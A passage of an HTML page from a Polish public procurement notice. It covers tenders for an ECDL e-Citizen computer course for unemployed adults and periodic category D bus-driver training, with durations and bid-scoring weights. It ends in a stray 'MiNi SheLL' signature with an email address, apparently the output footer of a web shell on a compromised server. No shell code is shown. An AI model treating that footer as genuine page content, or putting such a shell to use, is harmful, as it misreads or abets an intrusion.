<li>5. Akredytacja kuratora oświaty na określony kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS UMIEJĘTNOŚCI KOMPUTEROWYCH - EUROPEJSKI CERTYFIKAT UMIEJĘTNOŚCI KOMPUTEROWYCH ECDL e-OBYWATEL (e-CITIZEN).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem kursu jest nabycie umiejętności obsługi komputera w pracy zawodowej i w życiu codziennym oraz przygotowanie uczestników szkolenia do egzaminu praktycznego z zakresu ECDL e-Obywatel (e-Citizen). Szkolenie przeznaczone jest dla osób posiadających co najmniej wykształcenie zasadnicze zawodowe lub doświadczenie zawodowe (minimum 1 rok w ostatnich 5 latach) w zawodach wymagających znajomości obsługi komputera. W pierwszej kolejności kwalifikowane będą osoby bezrobotne powyżej 45 roku życia bez znajomości obsługi komputera. 
Zakres tematyczny szkolenia powinien obejmować następujące moduły szkoleniowe:
I. Trening interpersonalny, w tym trening motywacyjny i gotowości do zmian oraz metody i techniki poszukiwania pracy. 
Łącznie zagadnienia te powinny obejmować 30 godzin.
UWAGA!  Trening interpersonalny powinien zostać przeprowadzony na początku szkolenia, przed przystąpieniem do realizacji pozostałych bloków tematycznych w celu integracji grupy szkoleniowej i wzmocnienia motywacji do aktywnego uczestnictwa w szkoleniu.
II. Obsługa komputera na poziomie Europejskiego Certyfikatu Umiejętności Komputerowych ECDL e-Obywatel (e-Citizen) - 120 godzin, w tym obowiązkowo:
1)	użytkowanie komputerów,
2)	edytor tekstu MS Word,
3)	arkusz kalkulacyjny MS Excel,
4)	grafika menedżerska i prezentacyjna - MS Power Point,
5)	Internet i wyszukiwanie informacji (w tym m.in. związanych z zatrudnieniem i ofertami pracy),
6)	poczta elektroniczna,
7)	e-Uczestnictwo (w tym m.in.: załatwianie spraw urzędowych, robienie zakupów, płacenie rachunków, komunikowanie się z rodziną i przyjaciółmi za pośrednictwem Internetu, korzystanie z różnych serwisów informacyjnych).
Łącznie zagadnienia te muszą obejmować 120 godzin.
Zajęcia z zakresu obsługi komputera powinny zostać przeprowadzone w jednym czasie z podziałem na grupy liczące maksymalnie po 10 osób w każdej. Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy   
uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe. Należy zapewnić jednocześnie dwie pracownie komputerowe wyposażone w minimum 10 komputerów w każdej sali + 1 komputer dla instruktora zajęć w każdej sali (łącznie 22 komputery). Egzamin e-Obywatel (e-Citizen) musi być przeprowadzony w certyfikowanym Centrum Egzaminacyjnym ECDL przez certyfikowanych przez Polskie Biuro ECDL, odpowiednio przygotowanych egzaminatorów ECDL e-Obywatel 
(e-Citizen)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na określony kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SZKOLENIE OKRESOWE W ZAKRESIE PRAWA JAZDY KATEGORII D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Celem szkolenia jest nabycie przez uczestników szkolenia niezbędnych uprawnień do wykonywania pracy w zawodzie kierowcy autobusu wykonującego przewóz drogowy, zgodnie z Ustawą z dnia 6 września 2001 r. o transporcie drogowym (tekst jednolity: Dz. U. z 2007 r. Nr 125, poz. 874 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, poz. 314).    
2) Szkolenie okresowe, realizowane odpowiednio dla prawa jazdy kategorii D, powinno być przeprowadzone zgodnie z wymaganiami i wytycznymi zawartymi w wymienionym wyżej Rozporządzeniu Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy.                    
3) Szkolenie powinno być przeprowadzone przez instytucję szkoleniową spełniającą wymagania określone w cytowanym Rozporządzeniu Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy oraz Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834 z późn. zm.) w zakresie infrastruktury technicznej, warunków lokalowych, wyposażenia dydaktycznego oraz pojazdów używanych w trakcie szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, sprzęt i materiały dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na określony kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com